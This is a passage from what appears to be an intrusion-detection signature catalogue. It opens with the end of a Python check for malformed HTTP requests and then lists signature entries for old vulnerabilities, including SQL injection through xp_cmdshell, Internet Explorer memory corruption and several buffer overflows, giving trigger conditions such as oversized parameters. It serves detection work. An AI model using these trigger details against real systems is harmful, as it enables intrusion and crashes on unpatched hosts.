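    # Split on space *or* tab so the line is parsed the way a lenient server parses it;
    # an IDS that only splits on space never sees the method or URI of the TAB form.
    tokens = re.split(rb"[ \t]+", request_line.strip())
    method = tokens[0]
    if len(tokens) != 3 or not tokens[2].startswith(b"HTTP/"):
        findings.append("malformed-request-line")
    headers = parse_headers(head)
    try:
        content_length = int(headers.get(b"content-length", b"0"))
    except ValueError:
        content_length = 0
    # RFC 2616: a HEAD request has no meaningful body; either a declared
    # Content-Length or trailing bytes after the headers is anomalous.
    if method == b"HEAD" and (content_length > 0 or body):
        findings.append("head-with-body")
    return findings

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:15s} {inspect_request(raw) or 'clean'}")
```

Note that the truncated MiniShare request trips two checks at once: it is short of the second newline and, because there is no separator after HEAD, it does not even parse into three tokens. Both are worth reporting separately, since a server that tolerates one may still crash on the other.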
Signature ID: 1387
WS_FTP Weak Stored Password Encryption Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1078 Bugtraq: 547
Signature Description: Ipswitch WS_FTP Server is a fully featured and easy-to-administer file transfer server for
Microsoft Windows systems, used by administrators globally to support millions of end users and the transfer of billions
of files. Users can connect to a host, list folders and files, and (depending on permissions) download and upload data.
Administrators can control access to data and files with granular permissions by folder, user, and group, and can create
multiple hosts that function as completely distinct sites. Ipswitch WS_FTP Pro 6.0, WS_FTP LE 5.0 and WS_FTP LE
4.5 are vulnerable. WS_FTP, in both the Pro and LE versions, allows passwords to be saved as part of a saved site
configuration. The passwords are stored in the .ini files located in the WS_FTP folder; they are encrypted, but the
encryption method is weak and can be broken. An attacker who can retrieve the ws_ftp.ini file from outside the network
can therefore recover the stored credentials.
Signature ID: 1388
Wsh attempt Vulnerability
Threat Level: Information
Signature Description: WSH (Windows Script Host) is an ActiveX scripting host providing an environment for the
execution of scripts in several languages, such as VBScript. This rule triggers when an attacker attempts to run wsh.exe
on the remote machine through a web request; an attacker can use this to execute arbitrary code on the system.
Signature ID: 1389
SQL Inject Vulnerability through xp_availablemedia
Threat Level: Warning
Signature Description: Microsoft SQL Server allows the execution of Windows shell commands and other
operating-system actions through extended stored procedures. These run with the access rights of the account under
which SQL Server is running, usually Local System. This event is generated when an attempt to exploit a SQL injection
vulnerability on the remote machine references xp_availablemedia, an extended stored procedure that returns a list of
available storage devices that can be written to.
Signature ID: 1390
SQL Injection attempt through xp_cmdshell Vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote
machine. The xp_cmdshell extended stored procedure executes a given command string as an operating-system command
shell and returns any output as rows of text.
Signature ID: 1391
SQL Injection attempt through xp_enumdsn vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote
machine. xp_enumdsn is an extended stored procedure that returns a list of all system DSNs and their descriptions.
Signature ID: 1392
SQL Injection attempt with xp_filelist vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. Alternatively, an attacker may also use the xp_filelist procedure to learn whether or not a file exists.
This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote machine. The
xp_filelist extended stored procedure is used to determine whether or not a file exists.
Signature ID: 1393
SQL Injection attempt with xp_regdeletekey vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. Alternatively, an attacker may also try to delete registry keys using the procedure xp_regdeletekey.
This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote machine.
xp_regdeletekey is an extended stored procedure that deletes an entire registry key.
Signature ID: 1394
SQL Injection with xp_regread Vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. Alternatively, an attacker may also try to modify the registry using procedures such as
xp_regread. This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote machine.
xp_regread is an extended stored procedure used to read registry keys.
Signature ID: 1395
SQL Injection attempt using xp_regwrite vulnerability
Threat Level: Warning
Signature Description: Windows allows the execution of Windows shell commands through the SQL Server. The
access rights with which these commands will be executed are those of the account with which SQL Server is running,
usually Local System. Alternatively, an attacker may also try to modify the registry using procedures such as
xp_regwrite. This event is generated when an attempt is made to exploit a SQL injection vulnerability on the remote
machine. The xp_regwrite extended stored procedure is used to write to the registry.
Signature ID: 1396
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability-1
Threat Level: Information
Industry ID: CVE-2005-2831 Bugtraq: 15827
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM object as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. Users can set the kill bit for
CLSID DF0B3D60-548F-101B-8E65-08002B2BD119 to resolve this issue.
Signature ID: 1397
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2831 Bugtraq: 15827
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM object as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. This signature detects access
to the MSWC.MyInfo.1 COM object of the MyInfo ASP Component ('MyInfo.dll').
Signature ID: 1398
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2831 Bugtraq: 15827
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM object as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. Users can set the kill bit for
CLSID 8E71888A-423F-11D2-876E-00A0C9082467 to resolve this issue.
Signature ID: 1399
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2831 Bugtraq: 15827
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM object as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. This signature detects access
to the Creator.CdCreator.1 COM object of CdCreator ('creator.dll').
Signature ID: 1400
Microsoft Internet Explorer COM Object Instantiation Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2831 Bugtraq: 15827
Signature Description: Microsoft Internet Explorer 5.01, 5.5 and 6 are prone to a memory corruption vulnerability that
is related to the instantiation of COM objects. COM objects may corrupt system memory and facilitate arbitrary code
execution in the context of the currently logged in user on the affected computer. When instantiating a COM object as
an ActiveX control, a memory corruption error can occur. A remote attacker could exploit this vulnerability by creating
a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email. The attacker could
execute arbitrary code on the system and take complete control over the victim's system. This signature detects access
to the Creator.CdDevice.1 COM object of the CdDevice Class ('creator.dll').
Signature ID: 1401
Microsoft IE Nested OBJECT Tag Memory Corruption Vulnerability
Threat Level: Information
Industry ID: CVE-2006-1992 CVE-2006-2218 Bugtraq: 17820,17658
Signature Description: Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This issue is due to a
flaw in the application in handling nested OBJECT tags in HTML content, which triggers a NULL dereference. An
attacker could exploit this issue via a malicious web page to potentially execute arbitrary code in the context of the
currently logged-in user, but this has not been confirmed. Exploit attempts likely result in crashing the affected
application. Attackers could exploit this issue through HTML email/newsgroup postings or through other applications
that employ the affected component.
Signature ID: 1402
Microsoft Internet Explorer Content-Type Denial Of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-5162 Bugtraq: 19092
Signature Description: Internet Explorer is a graphical web browser developed by Microsoft. Microsoft Internet
Explorer version 6.x is vulnerable to a denial of service via a stack-based buffer overflow in wininet.dll. By persuading
a victim to visit a specially-crafted Web page that sends an overly long HTTP "Content-Type" header, a remote
attacker could overflow a buffer and cause the victim's Web browser to crash.
Signature ID: 1403
MS Windows HTML Help HHCtrl ActiveX Control Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-3357 Bugtraq: 18769
Signature Description: Windows Internet Explorer, commonly abbreviated to IE, is a series of graphical web browsers
developed by Microsoft and included as part of the Microsoft Windows line of operating systems; it has been the most
widely used web browser. Microsoft Internet Explorer 6, Internet Explorer 6 SP1, and Internet Explorer 6 SP2 are
vulnerable to a heap-based buffer overflow in the HTML Help ActiveX control (HHCtrl.ocx), because the browser does not
properly validate the control's 'Image' property. A remote attacker may exploit this issue via a malicious web page to
execute arbitrary code in the context of the currently logged-in user. Exploitation attempts may lead to a denial-of-service
condition as well. Attackers may also employ HTML email to carry out an attack. A remote attacker can cause a denial of
service (application crash) and possibly execute arbitrary code by repeatedly setting the Image field of an
Internet.HHCtrl.1 object to certain values.
Signature ID: 1404
Microsoft IE DataSourceControl DoS Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-3729 Bugtraq: 19069
Signature Description: Windows Internet Explorer, commonly abbreviated to IE, is a series of graphical web browsers
developed by Microsoft and included as part of the Microsoft Windows line of operating systems; it has been the most
widely used web browser. Microsoft Internet Explorer 6, Internet Explorer 6 SP2, and Internet Explorer 6 SP1 are
vulnerable to a denial of service caused by an integer underflow and a NULL pointer dereference that can occur when
processing a malformed DataSourceControl ActiveX object with a negative "getDataMemberName" property. A remote
attacker could exploit this vulnerability to cause a victim's browser to crash if the attacker can persuade the victim to
visit a malicious Web page.
Signature ID: 1405
MS IE/Apple Safari Browser Table Tag Status Bar URI Spoofing Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1121 Bugtraq: 11561,11573
Signature Description: Microsoft Internet Explorer, commonly abbreviated to IE, is a series of graphical web browsers.
Apple Safari is a web browser developed by Apple. Apple Mac OS X 10.2.8, Mac OS X 10.3.6, Mac OS X Server 10.2.8,
Mac OS X Server 10.3.6, Microsoft Internet Explorer 6.0.2800.1106, and Microsoft Outlook Express 6.0 are vulnerable
versions. A remote attacker could create a specially-crafted URL link containing A HREF tags that specify a spoofed
address and, within these tags, TABLE tags that specify the real destination address; this causes the spoofed URL to be
displayed in the status bar when the victim hovers the mouse over the link. An attacker could exploit this vulnerability by
creating a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML email.
Signature ID: 1406
Microsoft Internet Explorer IFRAME Status Bar URI Spoofing Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-4679 CVE-2004-1121 CVE-2005-3699 CVE-2005-4678 Bugtraq: 11590
Signature Description: Internet Explorer 6 for Windows XP Service Pack 2 is vulnerable to URI spoofing: Microsoft
Internet Explorer cannot correctly handle embedded frames with links surrounded by another link. Mishandling of an
HREF link combined with an IFRAME tag allows the attacker to display a genuine URI while, in the background, taking the
user to some other site. This enables phishing. The attacker could use additional social engineering techniques to trick
the victim into disclosing sensitive information such as credit card numbers, account numbers, and passwords.
Signature ID: 1407
McAfee ePolicy Orchestrator Agent HTTP POST Buffer Mismanagement Vulnerability
Threat Level: Critical
Industry ID: CVE-2004-0095 Bugtraq: 9476
Signature Description: McAfee ePolicy Orchestrator (ePo) is an antivirus program management tool for Microsoft
Windows operating systems. The McAfee ePolicy Orchestrator agent version 3.0 has been reported to contain a buffer
overflow vulnerability that may be exploited to crash the affected agent. The vulnerability lies in improper parsing
when receiving an HTTP POST request with an invalid value in the Content-Length header. The vulnerability may
cause a DoS or arbitrary code execution.
Signature ID: 1409
Microsoft Help and Support Center Argument Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0907 Bugtraq: 10119
Signature Description: Help and Support Center(HSC) is a feature of Microsoft Windows that enables users to
download and install software updates, check hardware compatibility and perform other system related tasks. HSC is
installed by default on Windows XP and Windows Server 2003 systems. Windows XP and Windows Server 2003 are
vulnerable to an argument injection vulnerability in HSC. By creating a specially-crafted hcp URL (by embedding quotes
in the argument, it is possible to insert new arguments into the command), a remote attacker could execute arbitrary code
on the victim's computer with the privileges of the victim once the URL is clicked. An attacker could exploit this
vulnerability by creating a malicious Web page and hosting it on a Web site or by sending it to a victim as an HTML
email.
Signature ID: 1411
Microsoft Internet Explorer HTML Tag Memory Corruption Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-1188 Bugtraq: 17468
Signature Description: Microsoft Internet Explorer 6 is prone to a memory corruption vulnerability that could allow a
remote attacker to execute arbitrary code on the system. The vulnerability is triggered while handling certain HTML tags
that are placed in an improper manner. The HTML tag <PRE> is used to display text in a way that preserves the letters
and spaces so that the rendered output is similar to the way the text was originally formatted. The HTML tag SPAN is
used to apply a style, using Cascading Style Sheets (CSS), to a specific block of HTML. When these tags are not properly
closed or are improperly placed in an HTML file, internal memory structures are not properly initialized and
may crash the IE browser. Microsoft indicated that code execution is possible but other researchers reported that code
execution is unlikely. If code execution is possible, it would execute in the security context of the logged in user. A
remote, unauthenticated attacker could exploit this vulnerability by crafting an HTML file that contains a specific
combination of HTML tags and style attributes, and then persuading unsuspecting users to open the crafted document
using a vulnerable version of Internet Explorer. Install the updates mentioned in Microsoft security bulletin MS06-013.
Microsoft Internet Explorer 6.0 SP1 and Microsoft Internet Explorer 6.0 are prone to this vulnerability.
Signature ID: 1412
Mozilla Firefox Deleted Object Reference Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-1993 Bugtraq: 17671
Signature Description: Mozilla Firefox is a free and open source web browser descended from the Mozilla Application
Suite, managed by the Mozilla Corporation. Firefox includes tabbed browsing, a spell checker, incremental find, live
bookmarking, a download manager, and an integrated search system that uses the user's desired search engine. Firefox
versions 1.5 through 1.5.0.2 running on Windows and Linux platforms are vulnerable. A remote attacker can exploit this
vulnerability to execute arbitrary code or cause a victim's browser to crash by creating a malicious Web page that uses
the contentWindow.focus() JavaScript call to reference a deleted object. This vulnerability resides in the implementation
of the Command controller functions, where objects are not properly initialized when designMode is enabled. Some
malware is known to use this exploit.
Signature ID: 1413
Mozilla Browser Marquee Denial of Service Vulnerability
Threat Level: Information
Industry ID: CVE-2006-272 CVE-2006-2723 Bugtraq: 18165
Signature Description: A web browser is a software application that enables a user to display and interact with text,
images, videos, music, games and other information typically located on a Web page at a website on the World Wide
Web or a local area network. Text and images on a Web page can contain hyperlinks to other Web pages at the same or
a different website; web browsers allow a user to quickly and easily access information provided on many Web pages at
many websites by traversing hyperlinks. Opera Software Opera Web Browser 8.51 and prior versions, Mozilla
SeaMonkey 1.1.11, Mozilla Gran Paradiso 3.0a1, Mozilla Firefox 2.0.0.3, Mozilla Firefox 1.5.0.3, Microsoft Internet
Explorer 6.0 SP1, and Microsoft Internet Explorer 6.0 are vulnerable to a denial of service. A remote attacker could
send a malicious Web page as an email; once the page is loaded, the browser will consume all available CPU
resources on the victim's system.
Signature ID: 1414
Microsoft Windows Media Player PNG Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2006-0025 Bugtraq: 18385
Signature Description: Windows Media Player (WMP) is a digital media player and media library application
developed by Microsoft that is used for playing audio, video and viewing images on personal computers running the
Microsoft Windows operating system, as well as on Pocket PC and Windows Mobile-based devices. Microsoft
Windows Media Player XP, Microsoft Windows Media Player 9.0, Microsoft Windows Media Player 7.1, and Microsoft
Windows Media Player 10.0 are vulnerable to a stack-based buffer overflow. PNG files are delivered as part of a WMP
skin upgrade. If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site, it could
potentially be used to run Java code to read and browse files on a local machine. The player does not perform proper
validation (bounds checks) of the PNG files contained in downloaded skins, so a remote attacker could overflow a
buffer and execute arbitrary code on the system once the file is opened.
Signature ID: 1415
Microsoft Windows Media Player PNG Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2006-0025 Bugtraq: 18385
Signature Description: Microsoft Windows Media Player 7 and above are vulnerable to a stack-based buffer overflow
caused by improper bounds checking of PNG files. These PNG files are delivered as part of a WMP skin upgrade. If a
Windows Media Player skin (.WMZ) file were downloaded from a malicious web site, it could potentially be used to run
Java code to read and browse files on a local machine. By doing so, a remote attacker could overflow a buffer and execute
arbitrary code on the system once the file is opened.
Signature ID: 1416
MySQL MaxDB Webtool HTTP GET request Stack Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2005-0684 CVE-2007-3614 CVE-2005-0684 Bugtraq: 13368,24773,13369
Signature Description: MySQL MaxDB is a heavy-duty, SAP-certified open source database. A web based application
interface, Webtool, which acts as an HTTP server, is provided with MaxDB. A remote buffer overflow vulnerability exists
in the way the Webtool component recognizes and interprets special characters. This issue is due to a failure of the
application to properly validate the length of user-supplied strings prior to copying them into static process buffers. An
attacker may exploit this issue by sending a malicious HTTP GET request containing a percent sign (%) with 4,000
bytes as a file parameter to MaxDB Webtool default port 9999. Successful exploitation may allow execution of
arbitrary code with the privileges of the user that activated the vulnerable application.
Signature ID: 1417
PeerCast URL Handling Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2006-1148 Bugtraq: 17040
Signature Description: PeerCast is an open source streaming media multicast tool. PeerCast uses peer to peer
technology to minimize the upload bandwidth required of the original multicaster. PeerCast 0.1217 and prior are
vulnerable to a stack-based buffer overflow. This vulnerability is due to insufficient sanitization of user-supplied data.
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the vulnerable
system. This issue is fixed in PeerCast 0.1217. Administrators are advised to update to PeerCast 0.1217 or a later version
to resolve this issue.
Signature ID: 1418
Microsoft IE Sysimage Protocol Handler Local File Detection Vulnerability
Threat Level: Warning
Bugtraq: 11834
Signature Description: Microsoft Internet Explorer is reported to have a vulnerability that may allow a remote site to
detect files on the local computer. A remote attacker can exploit this issue through the 'sysimage://' protocol handler to
detect the existence of a file on the local computer of the Web client viewing a malicious page. This could lead to
disclosure of sensitive information to remote attackers or could help the attacker plan further, more serious attacks.
Signature ID: 1420
Microsoft Internet Explorer Content Advisor File Handling Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0555 Bugtraq: 13117
Signature Description: Content Advisor is used to control what content is viewable in Internet Explorer. It allows
users to rate the appropriateness of Web content and to restrict which web sites can be visited by a user. The services
provided by Content Advisor are described in text files that follow the Platform for Internet Content Selection
(PICS) standard. A buffer overflow vulnerability exists in the msrating.dll library, where Content Advisor processes
PICS description files. The library does not check the length of an attribute in the description file before copying it into
a fixed-size buffer. By convincing a user to view an HTML document (e.g., a web page or HTML email message), an
attacker could execute arbitrary commands or code with the privileges of the user. Microsoft Internet Explorer 5.0.1
SP2, Microsoft Internet Explorer 5.0.1 SP3, and Microsoft Internet Explorer 5.0.1 SP4 are vulnerable to this
vulnerability. This signature checks for a flag set by track-state before generating a log entry.
Signature ID: 1422
HTML Winhlp32.exe Remote Buffer Overflow Vulnerability
Threat Level: Critical
Industry ID: CVE-2002-0823 Bugtraq: 4857
Signature Description: HTML Help makes use of the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help
ActiveX control is used to provide navigation features (such as a table of contents), to display secondary windows and
pop-up definitions, and to provide other features. Some features, as with the WinHlp Command, provided by the
HTML Help ActiveX control are meant to be available only when it is used from a compiled HTML Help file (.chm)
that is displayed by using the HTML Help Viewer. Winhlp32.exe is vulnerable to a buffer overrun attack using the
Item parameter within the WinHlp Command; the Item parameter is used to specify the file path of the WinHelp (.hlp) file
in which the WinHelp topic is stored, and the window name of the target window. Using this overrun, an attacker can
execute arbitrary code on a remote system by encouraging the victim to visit a particular web page.
Signature ID: 1423
Microsoft Internet Explorer DHTML Engine Race Condition Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0553 Bugtraq: 13120
Signature Description: Dynamic HTML (DHTML) extends static HTML pages to allow interactive web pages to be
easily created. Microsoft Internet Explorer versions 5.01, 5.5, and 6 could allow a remote attacker to execute arbitrary
code caused by a race condition when Dynamic HTML (DHTML) objects are processed. The DHTML Object Model
(DOM) specification allows users to create browser windows in addition to other elements. When a new browser
window is created, it is possible to refer to the parent window from the newly opened window. A race condition occurs
in Microsoft Internet Explorer (IE) when both the child and parent windows try to occupy the same memory due to
improper IE DOM implementation that incorrectly manages threads. Under these conditions it is possible to insert
arbitrary code, and have it run in the context of the web browser that is parsing the DHTML. An attacker could exploit
this vulnerability by creating a malicious Web page or an HTML e-mail message and then persuading the user to visit
the page or to view the HTML e-mail message. An attacker who successfully exploited this vulnerability could take
complete control of the affected system. Install the updates mentioned in Microsoft Security Bulletin MS05-020.
Signature ID: 1424
Windows Shell code vulnerability
Threat Level: Warning
Signature Description: This rule is triggered when an external web server sends Windows shellcode to a client on the
internal network. This can be considered a symptom of access to a malicious file.
Signature ID: 1425
Microsoft Internet Explorer DHTML Object Race Condition Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0553 Bugtraq: 13120
Signature Description: Dynamic HTML (DHTML) extends static HTML pages to allow interactive web pages to be
easily created. Microsoft Internet Explorer versions 5.01, 5.5, and 6 could allow a remote attacker to execute arbitrary
code caused by a race condition when Dynamic HTML (DHTML) objects are processed. The DHTML Object Model
(DOM) specification allows users to create browser windows in addition to other elements. When a new browser
window is created, it is possible to refer to the parent window from the newly opened window. A race condition occurs
in Microsoft Internet Explorer (IE) when both the child and parent windows try to occupy the same memory due to
improper IE DOM implementation that incorrectly manages threads. Under these conditions it is possible to insert
arbitrary code, and have it run in the context of the web browser that is parsing the DHTML. This rule specifically
looks for NULL element insertion. This can lead to random crashes and remote command execution. An attacker could
exploit this vulnerability by creating a malicious Web page or an HTML e-mail message and then persuading the user
to visit the page or to view the HTML e-mail message.
Signature ID: 1426
Microsoft Internet Explorer URL Parsing Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0554 Bugtraq: 13123
Signature Description: Windows Internet Explorer, commonly abbreviated to IE, is a series of graphical web browsers
developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft Internet
Explorer versions 5.01, 5.5, and 6 are vulnerable. The buffer overflow exists in IE's parsing of URLs when handling a
long hostname component. A remote attacker could craft a malicious web page that contains a URL with a hostname
longer than 256 bytes and host it on a Web site or send it to a victim as an HTML email. When such a link is processed,
the size of the hostname is not properly validated before it is copied into a buffer, so the buffer overflows.
Successful exploitation allows remote attackers to execute arbitrary code with the privileges of the current user.
Signature ID: 1427
Working Resources's BadBlue HTTP Server ext.dll Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0595 Bugtraq: 12673
Signature Description: BadBlue is a file sharing system and a small web server for Windows operating systems,
developed by Working Resources Inc. Working Resources Inc. BadBlue version 2.55 contains a remotely exploitable
buffer overflow vulnerability. A remote attacker could send a specially-crafted HTTP request to EXT.DLL that contains an
mfcisapicommand parameter longer than 250 characters. The server does not validate the user-supplied data, so a
buffer overflow occurs while processing the request. Successful exploitation could allow remote code execution on the
system with user privileges.
Signature ID: 1428
Real Networks Real Player WAV File Processing Heap Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0611 Bugtraq: 12697
Signature Description: RealNetworks RealPlayer is a multimedia application that allows users to view local and remote
audio/video content. RealPlayer 10.5 (6.0.12.1056 and earlier), 10, 8, and RealOne Player V2 and V1, Real Networks
Real Player and Helix Player are vulnerable to a heap based buffer overflow. The vulnerability is triggered when a
malicious WAV file's LIST chunk is processed. A LIST chunk is used to store associated information about a WAV file,
such as the audio track's title, artist, and copyright information. While processing, memory is allocated for each piece of
information based on a user-controlled length value in the LIST chunk header. This value is not verified, and the actual
data is copied byte-by-byte into the buffer until a NULL terminator is found. Therefore, if the actual data is larger than
the reported length value, a buffer overflow could occur during memory copy operations. Successful exploitation of
this vulnerability may execute arbitrary code with the privileges of the logged in user or may crash the vulnerable
media player.
Signature ID: 1429
MySQL MaxDB Webtool HTTP UNLOCK Request Lock-Token String Stack Overflow
Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0684 CVE-2005-0684 Bugtraq: 13368,13369
Signature Description: MySQL MaxDB is a heavy-duty, SAP-certified open source database. MaxDB ships with Webtool, a web-based application interface that acts as an HTTP server. A remote buffer overflow vulnerability exists in the way the Webtool component handles the Lock-Token string of an HTTP UNLOCK request. The issue is due to the application's failure to validate the length of user-supplied strings before copying them into static process buffers. An attacker may exploit this issue by sending a malicious HTTP UNLOCK request with a long Lock-Token string to the MaxDB Webtool default port, 9999. Successful exploitation may allow execution of arbitrary code with the privileges of the user who started the vulnerable application.
Signature ID: 1430
Mozilla Firefox PLUGINSPAGE attribute Remote Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0752 Bugtraq: 13228
Signature Description: When a web page requires a plugin to be displayed properly, the Plugin Finder Service (PFS) looks for an appropriate plugin. If the plugin is not installed, the service reads the PLUGINSPAGE attribute of the EMBED tag to locate where the plugin is available; if one is found, PFS opens a dialog containing a "manual install" button that loads the PLUGINSPAGE URL. If the PLUGINSPAGE attribute contains a javascript: URL, pressing the button could launch arbitrary code capable of stealing local data or installing malicious code.
Signature ID: 1431
Mozilla Firefox PLUGINSPAGE attribute Remote Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0752 Bugtraq: 13228
Signature Description: When a web page requires a plugin to be displayed properly, the Plugin Finder Service (PFS) looks for an appropriate plugin. If the plugin is not installed, the service reads the PLUGINSPAGE attribute of the EMBED tag to locate where the plugin is available; if one is found, PFS opens a dialog containing a "manual install" button that loads the PLUGINSPAGE URL. If the PLUGINSPAGE attribute contains a malformed URL of any protocol, pressing the button could launch arbitrary code capable of stealing local data or installing malicious code.
Signature ID: 1432
RealNetworks RealPlayer RAM File Parsing Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0755 Bugtraq: 13264
Signature Description: RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. RealPlayer contains a buffer overflow in its processing of Real Media (.ram) files. A .ram file specifies the URL where media clips are stored; once the file is processed, RealPlayer contacts that URL to locate and play the media clip. The vulnerability is due to improper checking of the hostname in the URL: when a malicious .ram file containing an overly long hostname string is processed, a buffer overflow occurs. Successful exploitation may execute arbitrary code or cause RealPlayer to crash.
Signature ID: 1433
Sun Java Web Start System Property Tags Remote Unauthorized Access Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0418 CVE-2005-0836 Bugtraq: 12847
Signature Description: Java Web Start is a technology for easy client-side deployment of Java applications. A vulnerability exists in the way Web Start handles Java system properties defined in Java Network Launching Protocol (JNLP) files. The <property> tag in a JNLP file can be used to define Java system properties. A few system properties are considered "secure" and, if defined in a JNLP file, are passed to the Java executable (javaw.exe) via the -Dproperty=value command line argument. However, because Web Start fails to place quotes around the property argument, a malicious user can use this feature to inject extra command line arguments into the Java executable's command line. Successful exploitation of this vulnerability can lead to the Java "sandbox" being disabled. Sun JRE (Solaris Production Release) 1.3.1 and prior versions are vulnerable.
Signature ID: 1434
MySQL MaxDB Webtool HTTP POST request Stack Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0684 CVE-2005-0684 Bugtraq: 13368,13369
Signature Description: MySQL MaxDB is a heavy-duty, SAP-certified open source database. MaxDB ships with Webtool, a web-based application interface that acts as an HTTP server. A remote buffer overflow vulnerability exists in the way the Webtool component recognizes and interprets special characters. The issue is due to the application's failure to validate the length of user-supplied strings before copying them into static process buffers. An attacker may exploit this issue by sending a malicious HTTP POST request in which the file parameter contains a percent sign (%) together with 4,000 bytes of data to the MaxDB Webtool default port, 9999. Successful exploitation may allow execution of arbitrary code with the privileges of the user who started the vulnerable application.
Signature ID: 1435
Real Player ActiveX Control Exported Functions HandleAction , ShowPreferences Argument
Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0189 Bugtraq: 12311
Signature Description: RealNetworks RealPlayer is a multimedia application that allows users to view local and remote audio/video content. The RealPlayer ActiveX control allows web authors to embed the RealPlayer application in HTML documents and control it. One of the exported functions of the RealPlayer ActiveX control is HandleAction, which executes a method or action. When HandleAction is used to call the ShowPreferences method, the RealPlayer preferences dialog is displayed, showing the specified category and page. RealPlayer 10.5 (6.0.12.1040) and earlier versions allow execution of arbitrary code via a long ShowPreferences argument. The ShowPreferences method concatenates its two arguments and then makes an unchecked call to sprintf(); by passing long arguments to ShowPreferences, an attacker can cause a stack-based buffer overflow. Any browser that supports ActiveX may be affected.
Signature ID: 1436
Microsoft Internet Explorer Channel Definition Format Script Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-0056 CVE-2005-0055 Bugtraq: 12427
